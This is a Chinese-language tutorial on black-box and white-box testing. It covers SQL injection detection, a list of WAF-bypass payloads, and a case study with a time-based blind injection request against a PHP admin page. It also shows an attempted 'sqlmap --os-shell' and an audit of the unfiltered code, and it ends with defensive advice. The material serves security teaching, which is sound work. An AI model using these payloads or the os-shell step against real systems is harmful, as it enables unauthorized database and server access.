黑白盒测试配合实战经验教学文档<\/h1>

前言<\/h2>

黑白盒测试是软件测试领域的两种核心方法，它们从不同角度保障Web应用程序质量：<\/p>

黑盒测试<\/strong>：关注功能性验证，模拟用户行为测试输入输出<\/li>

白盒测试<\/strong>：深入代码内部，检查逻辑路径、数据流等确保代码质量<\/li> <\/ul>
前期准备工具<\/h2>
1. Seay源代码审计系统<\/h3>

类型：开源代码审计工具<\/li>
功能：快速发现Web应用安全隐患<\/li>
可检测漏洞类型：SQL注入、XSS、文件包含等常见漏洞<\/li> <\/ul>
2. Fortify<\/h3>

类型：静态代码分析工具<\/li>
开发商：Micro Focus<\/li>
功能：全面扫描应用程序源代码<\/li>
可检测漏洞类型：注入攻击、XSS、访问控制缺陷等<\/li> <\/ul>
SQL注入漏洞实战<\/h2>
1. SQL注入判断方法<\/h3>
数字型注入<\/h4>

适用场景：参数为整型时<\/li>
测试方法：

输入：1'<\/code> 或 and 1=1<\/code> 和 and 1=2<\/code><\/li>
观察结果变化，不同则可能存在漏洞<\/li> <\/ul> <\/li> <\/ul> 字符型注入<\/h4> 适用场景：参数为字符串时<\/li> 测试方法：输入：'admin'<\/code> 和 'admin' and 1=1 --<\/code><\/li> 观察结果变化，不同则可能存在漏洞<\/li> <\/ul> <\/li> <\/ul> 其他类型注入<\/h4> 搜索型注入<\/li> Cookie注入<\/li> POST注入<\/li> 本质上是数字型和字符型注入的不同表现形式<\/li> <\/ul> 2. 绕过防御技巧<\/h3> 当遇到过滤或WAF时，可尝试以下方法：<\/p> 逻辑运算符绕过<\/strong>：<\/p> 'or'1'='1<\/code><\/li> 'or'a'='a<\/code><\/li> <\/ul> <\/li> 算术运算符绕过<\/strong>：<\/p> '+'1'='1<\/code><\/li> '*'1'='1<\/code><\/li> <\/ul> <\/li> 字符串拼接绕过<\/strong>：<\/p> 'and'str'='str<\/code><\/li> 'and'chr(97)'='a<\/code><\/li> <\/ul> <\/li> 注释符号绕过<\/strong>：<\/p> '\/* *\/and\/* *\/1=1<\/code><\/li> '\/*!50000and*\/1=1<\/code><\/li> <\/ul> <\/li> 十六进制编码绕过<\/strong>：<\/p> %27and%27g%27=%27f<\/code><\/li> %27or%271%27=%271<\/code><\/li> <\/ul> <\/li> 双重否定绕过<\/strong>：<\/p> 'and not('g'='f)<\/code><\/li> 'and not(1=2)<\/code><\/li> <\/ul> <\/li> <\/ol> 3. 实战案例<\/h3> 漏洞发现<\/h4> 目标系统：纯PHP开发的回调系统<\/li> 发现点：后台编辑功能URL格式统一为\/admin\/[功能]info.php?id=1<\/code><\/li> 测试URL： \/admin\/admininfo.php?id=1<\/code><\/li> \/admin\/codeinfo.php?id=1<\/code><\/li> <\/ul> <\/li> <\/ul> 漏洞验证<\/h4> 在admininfo.php<\/code>页面使用'<\/code>符号直接触发报错<\/li> 构造Payload： GET \/admin\/admininfo.php?id=1%27and%27g%27=%27f%27%3BSELECT%20SLEEP%285%29%23 <\/code><\/pre> <\/li> 确认存在时间盲注<\/li> <\/ul> 自动化工具利用<\/h4> 使用SQLMap进行进一步利用：命令：sqlmap --os-shell<\/code><\/li> 结果：因权限不足未能获取shell<\/li> <\/ul> <\/li> <\/ul> 4. 代码审计分析<\/h3> 漏洞代码片段：<\/p> require_once<\/span> '..\/includes\/common.php'<\/span>; <\/span><\/span>if<\/span> ($adminData['adminStatus'<\/span>] !=<\/span> 1<\/span>) Tips<\/span>::<\/span>error<\/span>('你没有权限访问此页面'<\/span>, '\/admin'<\/span>); <\/span><\/span>if<\/span> (empty<\/span>($_GET['id'<\/span>])) Tips<\/span>::<\/span>error<\/span>('参数错误'<\/span>, '\/admin\/adminlist.php'<\/span>); <\/span><\/span>if<\/span> ($_GET['id'<\/span>] ==<\/span> 1<\/span> &&<\/span> $adminData['id'<\/span>] !=<\/span> 1<\/span>) Tips<\/span>::<\/span>error<\/span>('不能修改首席总站长'<\/span>, '\/admin\/adminlist.php'<\/span>); <\/span><\/span>$id =<\/span> $_GET['id'<\/span>]; <\/span><\/span>$editData =<\/span> $adminClass-><\/span>GetAdmin<\/span>($id); <\/span><\/span><\/code><\/pre>问题点：<\/p> $_GET['id']<\/code>直接从URL获取，无任何验证或过滤<\/li> $id<\/code>直接传递给$adminClass->GetAdmin($id)<\/code>方法<\/li> 缺乏参数预处理和SQL语句安全处理<\/li> <\/ol> 总结<\/h2> 黑白盒测试结合<\/strong>：功能测试与代码审计相互印证，提高漏洞发现效率<\/li> 工具辅助<\/strong>：合理使用Seay、Fortify等工具减轻手工审计负担<\/li> SQL注入防御<\/strong>：所有用户输入必须验证和过滤<\/li> 使用参数化查询或预处理语句<\/li> 最小权限原则配置数据库账户<\/li> <\/ul> <\/li> 持续学习<\/strong>：关注最新bypass技术，保持防御手段更新<\/li> <\/ol>